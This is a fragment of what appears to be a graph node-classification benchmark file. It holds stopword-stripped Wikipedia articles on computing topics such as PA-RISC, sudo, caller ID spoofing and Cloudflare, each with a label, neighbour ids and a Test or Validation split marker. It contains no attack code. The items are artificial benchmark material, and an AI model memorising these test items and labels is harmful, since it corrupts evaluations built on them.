    "text": "Warp_&_Warp:warp amp warp player must take control monster fighter must shoot tongue-sticking aliens named berobero space world without letting touch kills three berobero colour row mystery alien appear killed extra points warp zone centre screen flashes katakana text japanese version english text warp us versions possible monster fighter warp maze world berobero must killed time-delay bombs delay controlled long player holds button every time kills one bombs get stronger making easier monster fighter blow bombs returns space world powerups may appear levels allow player shoot exploding bullets attach bombs directly onto enemy aliens however exploding bullets present space world obtained maze world powerup attach bombs onto enemies maze world appears space world players must alternate turns controls arcade version multiplayer mode two players play simultaneously famicom version first player controls white warpman second player controls orange warpman shooting player warpman multiplayer game causes become unable move fire certain period time three aliens called arcade version famicom version killing three aliens color causes mystery alien appear three four famicom version types mystery aliens three original types worth 500 1000 2000 points respectively fourth type mystery alien leaves one letter word extra killed extra life awarded player obtains five letters points awarded killing generic aliens differ depending area screen killed color changes three areas aliens killed near center screen yield highest number points 120 killed near edges yield lowest number points 60 killed near area worth 90 points killing multiple aliens single bomb maze world also worth 500 bonus points arcade version high score erased whenever cabinet reset turned famicom version high score kept even game reset erased console turned round number indicated flags bottom-right corner screen stop updating 48th round like namco galaxian king balloon number flags shown subsequent levels similarly indicator showing number lives remaining bottom-left corner stops updating four lives player still gain extra lives five lives remaining game reaches 1,000,000 points score roll",
    "neighbors": [
      9516,
      9006,
      10287,
      1776,
      10931,
      8663
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8943,
    "label": 4,
    "text": "Little_Snitch:little snitch little snitch host-based application firewall macos used monitor applications preventing permitting connect attached networks advanced rules produced maintained austrian firm objective development software gmbh unlike stateful firewall designed primarily protect system external attacks restricting inbound traffic little snitch designed protect privacy limiting outbound traffic little snitch controls network traffic registering kernel extensions standard application programming interface api provided apple application process attempts establish network connection little snitch prevents connection dialog presented user allows one deny permit connection one-time permanent basis dialog allows one restrict parameters connection restricting specific port protocol domain little snitch integral network monitor allows one see ongoing traffic real time domain names traffic direction displayed application version 4 received positive 4.5/5 review macworld",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      576,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3942,
      10470,
      10987,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 8944,
    "label": 3,
    "text": "PA-RISC:pa-risc pa-risc instruction set architecture isa developed hewlett-packard name implies reduced instruction set computer risc architecture pa stands precision architecture design also referred hp/pa hewlett packard precision architecture architecture introduced 26 february 1986 hp 3000 series 930 hp 9000 model 840 computers launched featuring first implementation ts1 pa-risc succeeded itanium originally ia-64 isa jointly developed hp intel hp stopped selling pa-risc-based hp 9000 systems end 2008 supported servers running pa-risc chips 2013 late 1980s hp building four series computers based cisc cpus one line ibm pc compatible intel i286-based vectra series started 1986 others non-intel systems one hp series 300 motorola 68000-based workstations another series 200 line technical workstations based custom silicon sapphire sos chip design sos based 16-bit hp 3000 classic series finally hp 9000 series 500 minicomputers based 16 32-bit focus microprocessor precision architecture result known inside hewlett-packard spectrum program hp planned use spectrum move non-pc compatible machines single risc cpu family first processors introduced 1986 thirty-two 32-bit integer registers sixteen 64-bit floating-point registers number floating-point registers doubled 1.1 version 32 became apparent 16 inadequate restricted performance architects included allen baum hans jeans michael j. mahon ruby bei-loh lee russel kao steve muchnick terrence c. miller david fotland william s. worley first implementation ts1 central processing unit built discrete transistor–transistor logic 74f ttl devices later implementations multi-chip vlsi designs fabricated nmos processes ns1 ns2 cmos cs1 pcx first used new series hp 3000 machines late 1980s – 930 950 commonly known time spectrum systems name given development labs machines ran mpe-xl hp 9000 machines soon upgraded pa-risc processor well running hp-ux version unix operating systems ported pa-risc architecture include linux openbsd netbsd nextstep interesting aspect pa-risc line generations level 2 cache instead large level 1 caches used formerly separate chips connected bus integrated on-chip pa-7100lc pa-7300lc l2 caches another innovation pa-risc addition vectorized instructions simd form max first introduced pa-7100lc precision risc organization industry group led hp founded 1992 promote pa-risc architecture members included convex hitachi hughes aircraft mitsubishi nec oki prime stratus yokogawa red brick software allegro consultants inc.. isa extended 1996 64 bits revision named pa-risc 2.0 pa-risc 2.0 also added fused multiply–add instructions help certain floating-point intensive algorithms max-2 simd extension provides instructions accelerating multimedia applications first pa-risc 2.0 implementation pa-8000 introduced january 1996",
    "neighbors": [
      10752,
      7173,
      9739,
      9742,
      2066,
      3603,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      1064,
      2088,
      6187,
      10796,
      3630,
      4144,
      6705,
      7218,
      1085,
      2623,
      2113,
      7234,
      1606,
      3142,
      2638,
      8795,
      2655,
      2656,
      1122,
      10851,
      2149,
      7269,
      3175,
      7783,
      8815,
      6268,
      3197,
      7806,
      7307,
      4237,
      142,
      4238,
      7313,
      9369,
      9371,
      8861,
      1694,
      6815,
      5793,
      6818,
      8355,
      6821,
      6311,
      682,
      7852,
      4269,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      6852,
      8900,
      9932,
      5326,
      5329,
      5844,
      9428,
      10966,
      731,
      11487,
      7911,
      4841,
      10985,
      5356,
      9964,
      5358,
      1776,
      757,
      2805,
      9976,
      249,
      8700,
      1278,
      8450,
      7939,
      2821,
      1798,
      7941,
      5384,
      1801,
      6924,
      6926,
      783,
      6415,
      1298,
      11539,
      1304,
      1820,
      9500,
      2339,
      6950,
      9003,
      3886,
      309,
      8501,
      823,
      8506,
      5948,
      833,
      8514,
      9541,
      3911,
      4423,
      7505,
      9044,
      344,
      8539,
      1376,
      8551,
      10603,
      9582,
      8048,
      4465,
      5492,
      10612,
      6006,
      1399,
      10104,
      7033,
      1402,
      3451,
      10620,
      3457,
      6529,
      4491,
      3470,
      5518,
      5523,
      6038,
      407,
      409,
      10658,
      3493,
      9126,
      936,
      10669,
      1967,
      2480,
      8625,
      11184,
      10675,
      1461,
      1462,
      1463,
      4534,
      8120,
      1469,
      4030,
      8125,
      8126,
      6084,
      453,
      3014,
      8136,
      6607,
      977,
      466,
      2514,
      11218,
      2517,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      6129,
      499,
      4596,
      2039,
      10746,
      4603,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 8945,
    "label": 3,
    "text": "Ad_Lib,_Inc.:ad lib inc ad lib inc. canadian manufacturer sound cards computer equipment founded martin prevel former professor music vice-dean music department université laval company best known product adlib music synthesizer card almsc simply adlib called first add-on sound card ibm compatibles achieve widespread acceptance developers adoption games becoming first de facto standard audio reproduction today adlib functionality recreated emulators adplug vdmsound latter deprecated source code incorporated dosbox emulating adlib gold 1000 proves challenge due surround sound module 2x oversampling effect development work almsc adlib music synthesizer card concluded prevel struggled engage development community company new product example handed development kits trade shows hopes reach development staff software companies attendees simply used handouts personal entertainment discarded outright subsequently prevel engaged assistance top star computer services inc. also known tscs new jersey company provided quality assurance services game developers top star president rich heimlich sufficiently impressed product demonstration quebec 1987 endorse product top customers sierra on-line king quest iv became first game title support adlib game high audio production values including hired professional composer riding already popular game franchise catapulted adlib card mainstream media coverage soon game developers embraced adlib hoping give software competitive edge retail channel side retail stores chains wholesale distributor selling adlib sound cards 1990 adlib used yamaha ym3812 sound chip produces sound via fm synthesis adlib card consisted ym3812 chip off-the-shelf external glue logic plug standard pc compatible isa 8-bit slot pc software generated multitimbral music sound effects adlib card although acoustic quality distinctly synthesized digital audio pcm supported would become key missing feature competitor creative labs implemented sound blaster cards still possible however output pcm sound card software modulating playback volume audio rate done example microprose game f-15 strike eagle ii multi-channel music editor sound club ms-dos engineers developed sound cards software libraries adlib worked lyrtech notable sound designer worked adlib henri chalifour designed sound demos instrumental showing adlib products could including scoring music adlib commercial two separate revisions original adlib sound card original design 1987 provided mono output via ¼ inch jack aimed composers musicians second design 1990 used 3.5 mm miniature mono output quickly becoming new standard computer game industry adlib release microchannel version original sound card adlib mca used mca p82c611 interface ic notable updates mca version use volume wheel original potentiometer made card thick mca standard ad lib planned wholly new proprietary standard releasing 12-bit stereo sound card called adlib gold gold 1000 used later generation yamaha ymf262 opl3 12-bit digital pcm capability retaining backward compatibility opl2 opl3 chip albeit opl3 responds slightly differently ym3812/opl2 commands sound 100 exactly alike onboard yamaha ymz263-f also performs 2x oversampling would affect opl3 output slightly surround sound module developed optional attachment allowed chorus surround effect enabled opl3 outputs however games supported one unique aspect could initialized certain sounds affect entire output default optional attachments scsi support modem support development well evidence anti-competitive behavior creative failure card yamaha made parts creative adlib creative yamaha biggest customer time chip yamaha created adlib card continually failed pass testing creative yamaha chip passed enabled creative come market first shortly adlib chip passed testing late sustain despite adlib efforts gold 1000 failed capture market company eventually went bankrupt cheaper alternatives creative labs sound blaster 16 adlib designed gold 1000 mainly in-house gold 1000 layout lot discrete circuitry many surface mount components grid array creative labs able integrate sound cards tightly reduce cost gold 1000 finally released sound blaster series entrenched de facto pc sound card standard priced significantly cheaper adlib gold however sound blaster 16 suffered noisier output cheaper components contain unique 2x oversampling effect pc game developers supported gold directly however adlib gold support still found way small number mainstream games descent rayman dune police quest 3 bought games adlib gold 1000 planned ibm microchannel architecture bus named adlib gold mc2000 however adlib went bankrupt card could produced known prototypes confirmed success adlib music card soon attracted competitors long introduction creative labs introduced competing sound blaster card sound blaster fully compatible adlib hardware meaning would play past present future game written adlib card also added two key features absent adlib pcm audio channel game port pcm audio could record play digital audio recordings included dialogue sound effects short musical performances although pcm audio fidelity scarcely better radio allowed game developers include realistic sound effects speech could reproduced yamaha fm synthesis proved popular among game developers finally sound blaster inclusion game port made single-card gaming system superior product better marketing sound blaster quickly overshadowed adlib de facto standard pc gaming audio adlib slow response adlib gold sell well enough sustain company 1992 ad lib filed bankruptcy sound blaster family continued dominate pc game industry year binnenalster gmbh germany purchased assets ad lib government quebec acquired prevent creative labs buying company renamed adlib multimedia relaunched adlib gold sound card many products binnenalster sold adlib multimedia softworld taiwan 1994",
    "neighbors": [
      7108,
      5702,
      2861,
      400,
      5009,
      5265,
      6129,
      8561,
      8945,
      10359,
      4699
    ],
    "mask": "Test"
  },
  {
    "node_id": 8946,
    "label": 5,
    "text": "Reliable_Datagram_Sockets:reliable datagram sockets reliable datagram sockets rds high-performance low-latency reliable connectionless protocol delivering datagrams developed oracle corporation included linux kernel 2.6.30 released 9th june 2009 code contributed openfabrics alliance ofa october 19 2010 vsr announced vulnerability within linux 2.6.30 kernel could result local privilege escalation via kernel implementation rds subsequently fixed may 8 2019 cve-2019-11815 published regarding race condition linux rds implementation could lead use-after-free bug possible arbitrary code execution bug fixed linux 5.0.8",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      7570,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      1954,
      9380,
      2085,
      9381,
      3751,
      3752,
      6184,
      10924,
      562,
      5682,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 8947,
    "label": 9,
    "text": "JSyn:jsyn jsyn java synthesis free api developing interactive sound applications java developed phil burk others distributed burk company mobileer inc. jsyn flexible unit generator-based synthesis dsp architecture allows developers create synthesizers audio playback routines effects processing algorithms within java framework allows easy integration java routines e.g graphics user interface etc. plugin available web browsers run jsyn-enabled applets distributed world wide web although fundamentally synthesis language imitative directly inspired csound music-n languages jsyn number powerful extensions ancillary libraries including jmsl java update hmsl music specification language jscore staff notation editor library adds significantly higher level musical informatics package would normally supplied set synthesis routines wire graphical editor jsyn routines also allows developers create dsp chains using simple gui gives api ease use programs max/msp commercial though inexpensive developer license allows jsyn incorporated commercial applications",
    "neighbors": [
      9210,
      5677,
      8958,
      6810,
      7550,
      9023
    ],
    "mask": "Test"
  },
  {
    "node_id": 8948,
    "label": 3,
    "text": "Paul_Horn_(computer_scientist):paul horn computer scientist paul m. horn born august 16 1946 american computer scientist solid state physicist made contributions pervasive computing pioneered use copper self-assembly chip manufacturing helped manage development deep computing important tool provides business decision makers ability analyze develop solutions complex difficult problems horn born august 16 1946 graduated clarkson college 1968 bachelor science degree obtained phd university rochester physics 1973 horn various times senior vice president ibm corporation executive director research ibm initiated project develop watson computer competed successfully quiz show jeopardy currently new york university nyu distinguished scientist residence nyu stern executive residence also professor nyu tandon school engineering 2009 appointed senior vice provost research nyu",
    "neighbors": [
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8949,
    "label": 2,
    "text": "Real-Time_Multiprogramming_Operating_System:real-time multiprogramming operating system real-time multiprogramming operating system rtmos 24-bit process control operating system developed 1960s general electric supported real-time computing multiprogramming programming done assembly language process fortran two languages could used program allowing programmers alternate two desired multiprogramming operating systems considered obsolete replaced multitasking",
    "neighbors": [
      2345,
      2179,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 8950,
    "label": 4,
    "text": "Caller_ID_spoofing:caller id spoofing caller id spoofing practice causing telephone network indicate receiver call originator call station true originating station example caller id display might display phone number different telephone call placed term commonly used describe situations motivation considered malicious originator caller id spoofing available years people specialized digital connection telephone company called isdn pri circuit collection agencies law-enforcement officials private investigators used practice varying degrees legality first mainstream caller id spoofing service star38.com launched september 2004 star38.com first service allow spoofed calls placed web interface stopped offering service 2005 handful similar sites launched august 2006 paris hilton accused using caller id spoofing break voicemail system used caller id authentication caller id spoofing also used purchase scams web sites craigslist ebay scamming caller claims calling canada u.s. legitimate interest purchasing advertised items often sellers asked personal information copy registration title etc. scammer purchaser invests time effort come see for-sale items 2010 election fake caller ids ambulance companies hospitals used missouri get potential voters answer phone 2009 vindictive brooklyn wife spoofed doctor ’ office husband ’ lover attempt trick woman taking medication would make miscarry frequently caller id spoofing used prank calls example someone might call friend arrange white house appear recipient caller display december 2007 hacker used caller id spoofing service arrested sending swat team house unsuspecting victim february 2008 collegeville pennsylvania man arrested making threatening phone calls women home numbers appear caller id make look like call coming inside house march 2008 several residents wilmington delaware reported receiving telemarketing calls early morning hours caller apparently spoofed caller id evoke tommy tutone ’ 1981 hit 867-5309/jenny “ 2014 increase illegal telemarketers displaying victim number either verbatim digits randomised observed attempt evade caller id-based blacklists canadian federal election may 2 2011 live calls robocalls alleged placed false caller id either replace caller identity fictitious person pierre poutine joliette quebec disguise calls ohio call centre peterborough ontario domestic calls see robocall scandal june 2012 search google returned nearly 50,000 consumer complaints individuals receiving multiple continuing spoofed voice ip voip calls lines leased originating “ pacific telecom communications group ” located los angeles ca mailbox store apparent violation fcc rules companies lease thousands phone numbers anonymous voice-mail providers combination dubious companies like “ phone broadcast club ” actual spoofing allow phone spam become increasingly widespread pervasive problem 2013 misleading caller name teachers phone reported large quantity robocalls advertising credit card services ruse trick students families answering unwanted calls mistaken belief local schools january 7 2013 internet crime complaint center issued scam alert various telephony denial service attacks fraudsters using spoofed caller id impersonate police attempt collect bogus payday loans placing repeated harassing calls police victim number displayed impersonation police common scams involved impersonating utility companies threaten businesses householders disconnection means extort money impersonating immigration officials impersonating medical insurers obtain personal data use theft identity bogus caller id also used grandparent scams target elderly impersonating family members requesting wire transfer money caller id spoofed variety methods different technology popular ways spoofing caller id use voip pri lines past caller id spoofing required advanced knowledge telephony equipment could quite expensive however open source software asterisk freeswitch almost voip company one spoof calls minimal costs effort voip providers allow user configure displayed number part configuration page provider web interface additional software required caller name sent call instead generated number database lookup destination may configured part settings client-owned analog telephone adapter sip phone level flexibility provider-dependent provider allows users bring device unbundles service direct inward dial numbers may purchased separately outbound calling minutes flexible carrier n't follow established hardware standards skype locks subscribers configuration settings hardware subscriber owns outright vonage restrictive providers market wholesale voip typically intended allow displayed number sent resellers want end user numbers appear rare cases destination number served voice-over-ip reachable directly known sip address may published enum telephone number mapping .tel dns record located using intermediary sip broker google voice users directly reachable sip inum initiative numbers country codes +883 5100 +888 federated voip scheme provides direct internet connection pass signaling gateway public switched telephone network shares advantages nearly free unlimited access worldwide disadvantages ernet applications spoofing services work similarly prepaid calling card customers pay advance personal identification number pin customers dial number given company pin destination number number wish appear caller id call bridged transferred arrives spoofed number chosen caller—thus tricking called party many providers also provide web-based interface mobile application user creates account logs supplies source number destination number bogus caller id information displayed server places call two endpoint numbers bridges calls together providers offer ability record calls change voice send text messages another method spoofing emulating bell 202 fsk signal method informally called orange boxing uses software generates audio signal coupled telephone line call object deceive called party thinking incoming call waiting call spoofed number fact new incoming call technique often also involves accomplice may provide secondary voice complete illusion call-waiting call orange box truly spoof incoming caller id prior answering relies certain extent guile caller considered much social engineering technique technical hack methods include switch access signaling system 7 network social engineering telephone company operators place calls desired phone number telephone exchange equipment manufacturers vary handling caller name display much equipment manufactured bell system companies united states sends caller number distant exchange switch must use database lookup find name display calling number canadian landline exchanges often run nortel equipment sends name along number mobile clec internet independent exchanges also vary handling caller name depending switching equipment manufacturer calls numbers differing country codes represent complication caller id often displays local portion calling number without indicating country origin format mistaken domestic invalid number results multiple possible outcomes caller id spoofing remains legal canada recently become prevalent canadian anti-fraud centre add ed automated message practice fraud-reporting hotline crtc estimates 40 complaints receive regarding unsolicited calls involve spoofing agency advises canadians file complaints regarding calls provides list protection options dealing website july december 2015 held public consultation identify technical solutions address issue regulators set march 31 2019 target date implementation cid authentication system december 19 2018 crtc announced beginning december 19 2019 phone providers must block calls ids purport originate telephone numbers conform established numbering plans according report india department telecommunications government india taken following steps cli spoofing service providers per dot using spoofed call service illegal per indian telegraph act sec 25 c using service may lead fine three years imprisonment uk spoofed number called presentation number must either allocated caller allocated third party used third party explicit permission starting 2016 direct marketing companies obliged display phone numbers offending companies hit fines £2 million ofcom caller id spoofing generally legal united states unless done intent defraud cause harm wrongfully obtain anything value relevant federal statute truth caller id act 2009 make exceptions certain law-enforcement purposes callers also still allowed preserve anonymity choosing block outgoing caller id information phone lines act also targets voip services illegal cause caller identification service knowingly transmit misleading inaccurate caller identification information intent defraud cause harm wrongfully obtain anything value ... forfeiture penalties criminal fines 10,000 per violation exceed 1,000,000 could imposed law maintains exemption blocking one outgoing caller id information law enforcement n't affected new york times sent number 111-111-1111 calls made offices august 15 2011 fake number intended prevent extensions reporters appearing call logs thus protect reporters divulge calls made anonymous sources times abandoned practice proposed changes caller id law many companies blocking calls well-known number starting mid-2017 intended culmination 2019 fcc pushed forward caller id certification implemented via methodology shaken/stir shaken/stir acronyms signature-based handling asserted information using tokens shaken secure telephone identity revisited stir standards august 1 2019 fcc voted extend truth caller id act international calls text messaging",
    "neighbors": [
      1601,
      11170,
      4163,
      2920,
      2409,
      1899,
      4753,
      7730,
      11671,
      1914,
      10299,
      10269
    ],
    "mask": "Test"
  },
  {
    "node_id": 8951,
    "label": 6,
    "text": "Sector_slipping:sector slipping sector slipping technique used deal defective sectors hard disk drives due volatility hard disks moving parts low tolerances sectors become defective defective sectors even come hard disks factory disks incorporate bad-block recovery system cope issues low-level format defect lists populated store sectors bad bad sectors mapped sector slipping algorithm utilized using sector slipping bad sectors disk access time largely affected drive skip sectors takes time would read sector spare sectors located disk aid sectors “ slip ” sectors allowing preservation sequential ordering data accuracy programs reliant static knowledge cylinders block positions compromised though bad sectors found normal usage disk capable sector slipping algorithm applied instead linear reallocation sector forwarding used bad sector replaced sector spare area affect access times disk need seek spare sector since lookups bad sector redirect new sector example physical sectors 3 5 found bad sectors slipped allow logical sectors placed sequential order good sectors sector 3 slipped 4 sector 4 slipped 6 rest sectors slipped remaining spare sectors sector 4 6 sector 5 7",
    "neighbors": [
      3841,
      3315
    ],
    "mask": "Test"
  },
  {
    "node_id": 8952,
    "label": 3,
    "text": "Palm_III:palm iii palm iii personal digital assistant made palm computing division 3com went sale 1998 replacement palmpilot handheld first palm handheld support infrared file transfer flash rom-capable operating system release palm iii priced us 400 first glance notable difference palm iii predecessor palmpilot rugged streamlined case differences include removable hard cover protect screen removal memory door recessed contrast adjustment knob infrared port battery door less prone accidentally falling palm iii ran new palm os version 3.0 featured new application launcher extra font size bug fixes improvements featured two megabytes edo sdram storage user data software two megabytes flash rom storage operating system built-in applications lcd screen palm iii essentially palm pilot professional palm pilot personal display 2-bit greyscale lcd screen also electroluminescent backlight turned holding power button three seconds allow easier viewing dark areas palm iii os rom ram mounted memory card separate motherboard card could replaced third party upgrade card increase palm iii storage functionality year 2000 kodak released palmpix digital camera image display screen palm handheld",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      7151,
      1776,
      2420,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 8953,
    "label": 3,
    "text": "The_Earth_Fighter_Rayieza:earth fighter rayieza game character designer go nagai also drew illustrations game package game background music composed y. sawamura sawamura included arranged version yellow magic orchestra rydeen battle theme year 2300 human race created earth federation government spread space begin colonizing surrounding planets however alien species far reaches outer space began attacking human forces putting survival human race stake though matter time earth fell enormous power enemy forces earth army commander issued order calling units dispersed around colonized planets return earth player takes role young soldier stationed rayieza unit planet mars journey begins makes way back earth along members unit family computer port game released december 15 1987 though game largely faithful port pc version arrangements made addition side-scrolling screen player lands planet surface rimi able use psychic powers later parts game enemies begin appear frequently new enemy special attacks added lower maximum hit-points allied characters lowered points return next time character level increases",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 8954,
    "label": 4,
    "text": "Sudo:sudo sudo program unix-like computer operating systems allows users run programs security privileges another user default superuser originally stood superuser older versions codice_1 designed run commands superuser however later versions added support running commands superuser also restricted users thus also commonly expanded substitute user although latter case reflects current functionality accurately codice_1 still often called superuser since often used administrative tasks unlike similar command su users must default supply password authentication rather password target user authentication configuration file typically located codice_3 permits user access system invokes requested command configuration file offers detailed access permissions including enabling commands invoking terminal requiring password per user group requiring re-entry password every time never requiring password particular command line also configured permit passing arguments multiple commands robert coggeshall cliff spencer wrote original subsystem around 1980 department computer science suny/buffalo robert coggeshall brought sudo university colorado boulder 1986 1993 code features substantially modified staff university colorado boulder computer science department college engineering applied science including todd c. miller current version publicly maintained openbsd developer todd c. miller since 1994 distributed isc-style license since 1999 november 2009 thomas claburn response concerns microsoft patented sudo characterized suspicions overblown claims narrowly framed particular gui rather sudo concept unlike command su users supply personal password sudo necessary authentication configuration file permits user access system invokes requested command sudo retains user invocation rights grace period 5 minutes per pseudo terminal default see https //www.sudo.ws/man/1.8.27/sudo.man.html allowing user execute several successive commands requested user without provide password sudo may configured log command run user attempts invoke sudo without listed configuration file exception indication presented user indicating attempt recorded root user alerted via mail entry recorded system log file /etc/sudoers contains list users user groups permission execute subset commands privileges root user another specified user program may configured require password system distributions sudo largely supplanted default use distinct superuser login administrative tasks notably linux distributions well apple macos allows secure logging admin commands prevents exploits association selinux sudo used transition roles role-based access control rbac visudo command-line utility allows editing sudo configuration file fail-safe manner prevents multiple simultaneous edits locks performs sanity syntax checks program runas provides similar functionality microsoft windows pass current directories environment variables long command lines child supports running child another user support simple elevation true su sudo windows pass state information start child either elevated another user included hamilton c shell graphical user interfaces exist sudo notably kdesudo gksudo deprecated debian longer included ubuntu release 18.04 user interfaces directly built sudo provide similar temporary privilege elevation administrative purposes user account control microsoft windows mac os x authorization services doas available since openbsd 5.8 october 2015 written order replace sudo openbsd base system latter still made available port",
    "neighbors": [
      515,
      260,
      9733,
      9223,
      3976,
      2825,
      3465,
      9735,
      1932,
      13,
      4750,
      6797,
      10631,
      274,
      2322,
      788,
      5397,
      2198,
      7702,
      537,
      10105,
      6812,
      5923,
      7847,
      4398,
      6702,
      7983,
      9520,
      10036,
      1336,
      5179,
      700,
      7356,
      965,
      2245,
      1993,
      8522,
      3659,
      3404,
      8778,
      11086,
      210,
      5970,
      10835,
      4951,
      9946,
      5084,
      7139,
      1637,
      3815,
      4071,
      6120,
      5230,
      9839,
      4850,
      5492,
      9204,
      1785,
      6138,
      7804,
      2045,
      5759
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8955,
    "label": 4,
    "text": "Access_level:access level computer science computer programming access level denotes set permissions restrictions provided data type reducing access level effective method limiting failure modes debugging time overall system complexity restricts variable modification methods defined within interface class thus incorporated many fundamental software design patterns general given object created read updated deleted function without sufficient access level two common access levels public private denote respectively permission across entire program scope permission within corresponding class third protected extends permissions subclasses corresponding class access levels modifiers commonly used java well c provides internal level c++ difference struct class default access level private classes public structs illustrate benefit consider public variable accessed part program error occurs culprit could within portion program including various sub-dependencies large code base leads thousands potential sources alternatively consider private variable due access restrictions modifications value must occur via functions defined within class therefore error structurally contained within class often single source file class means debugging requires evaluation single file sufficient modularity minimal access level large code bases avoid many challenges associated complexity retrieved java coffee break q imperative variable balance defined private int ensures classes methods functions accidentally overwrite variable balance instead must access interface class bank_balance whose methods ensure balance drop 0",
    "neighbors": [
      10145,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 8956,
    "label": 4,
    "text": "Cloudflare:cloudflare cloudflare inc. u.s. web infrastructure website security company providing content delivery network services ddos mitigation internet security distributed domain name server services cloudflare services sit website visitor cloudflare user hosting provider acting reverse proxy websites cloudflare headquarters san francisco california additional offices lisbon london singapore munich san jose champaign illinois austin new york city washington d.c. cloudflare faced controversy number times stance providing technical support online hate groups terrorists citing free speech concerns cloudflare ensured continue abide law serve customers explaining proper role internet censor example one time cloudflare provided technical services 8chan image board linked multiple mass shootings united states christchurch mosque shootings new zealand however 2017 cloudflare succumbed pressure longer provide services neo-nazi website daily stormer similarly august 2019 cloudflare stopped services 8chan following mass shooting el paso 2014 cloudflare introduced project galileo response cyber attacks launched important yet vulnerable targets artistic groups humanitarian organizations voices political dissent 2019 cloudflare celebrated five-year anniversary project galileo announced 600 users organisations currently participating cloudflare created 2009 matthew prince lee holloway michelle zatlyn previously worked project honey pot cloudflare launched september 2010 techcrunch disrupt conference received media attention june 2011 providing security lulzsec website june 2012 cloudflare partnered various web hosts including hostpapa implement railgun technology february 2014 cloudflare mitigated largest-ever recorded ddos attack time peaked 400 gbit/s undisclosed customer november 2014 cloudflare reported another massive ddos attack independent media sites targeted 500 gbit/s november 2009 cloudflare raised 2.1 million series round pelion venture partners venrock july 2011 cloudflare raised 20 million series b round new enterprise associates pelion venture partners venrock december 2012 cloudflare raised 50 million series c round new enterprise associates pelion venture partners venrock union square ventures greenspring associates december 2014 cloudflare raised 110 million series round led fidelity investments participation google capital microsoft qualcomm baidu march 2019 cloudflare raised 150 million series e round led franklin templeton investments participation new enterprise associates union square ventures venrock pelion venture partners greenspring associates capitalg microsoft baidu qualcomm fidelity february 2014 acquired stopthehacker offers malware detection automatic malware removal reputation blacklist monitoring december 2016 cloudflare acquired eager view upgrading cloudflare apps platform allow drag-and-drop installation third-party apps onto cloudflare-enabled sites late 2017 cloudflare acquired neumob mobile vpn startup customers cloudflare offers 'm attack mode cloudflare claims mitigate advanced layer 7 attacks presenting javascript computational challenge must completed user browser user access website march 2013 cloudflare defended spamhaus ddos attack exceeded 300 gbit/s akamai chief architect stated time largest publicly announced ddos attack history internet cloudflare also reportedly absorbed attacks peaked 400gbit/s ntp reflection attack cloudflare allows customers paid plans utilize web application firewall service default firewall owasp modsecurity core rule set alongside cloudflare ruleset rulesets popular web applications cloudflare offers free authoritative domain name system dns service clients powered anycast network solvedns found cloudflare consistently one fastest dns lookup speeds worldwide reported lookup speed 5.6ms july 2019 april 1 2018 cloudflare announced 'privacy-first consumer dns service hosted ip addresses 1.1.1.1 1.0.0.1 alternatively service accessed via ipv6 2606:4700:4700 :1111 2606:4700:4700 :1001 november 11 2018 cloudflare announced mobile version 1.1.1.1 service ios android key functionality cloudflare act reverse proxy web traffic cloudflare supports new web protocols including spdy http/2 addition cloudflare offers support http/2 server push cloudflare also supports proxying websockets cloudflare network highest number connections internet exchange points network worldwide cloudflare caches content edge locations act content delivery network cdn requests reverse proxied cloudflare cached content served directly cloudflare 2014 cloudflare introduced project galileo response cyber attacks launched important yet vulnerable targets artistic groups humanitarian organizations voices political dissent working free speech public interest civil society organizations cloudflare extended enterprise-class ddos protection business-level performance benefits ensure websites stay online without violated project galileo compared alphabet project shield different service providing protection vulnerable humanitarian free-speech groups contrast project shield project galileo create guidelines eligible users rather outsourced selection 28 non-profit organisations one accept users program cloudflare ceo matthew prince hopes companies follow suit start similar projects according project galileo users organisations benefit able choose work notion echoed cloudflare ceo since project started 2014 cloudflare remained fairly secretive project part avoid drawing attention organisations might targeted five-year anniversary project blogpost created sharing detail service revealing 600 organisations currently participating announcing number new additions cloudflare created project athenian ensure state local government election websites highest level protection enterprise grade reliability free constituents always access election information voter registration 2019 cloudflare announced new domain registrar service promised offer low-cost wholesale pricing easy ways enable dnssec april 1 2019 cloudflare announced new freemium virtual private network service named warp service would initially available 1.1.1.1 mobile apps desktop app available later june 21 2019 cloudflare announced users would able sync computers time securely cloudflare ntp service cloudflare ’ time service allow users connect network time protocol ntp server supports network time security nts enabling users obtain time authenticated manner cloudflare provides dns services 12 million websites adding approximately 20,000 new customers every day cloudflare provided support services 8chan august 2019 8chan since moved bitmitigate august 3 interview immediately post 2019 el paso shooting guardian matthew prince defended cloudflare support 8chan saying happened el paso today abhorrent every possible way ’ ugly hate ’ association us … us question worse evil cloudflare come pressure multiple occasions due ironclad policy free speech refusing cease technical support dns routing ddos mitigation etc websites lulzsec daily stormer 8chan activists argue cloudflare services allow access content spreads hate led harm deaths cloudflare consider content passes infrastructure protected first amendment matter content consequences.cloudflare broad legal immunity content produced users cloudflare provided dos protection hacker group lulzsec services garnered significant positive media attention time cloudflare 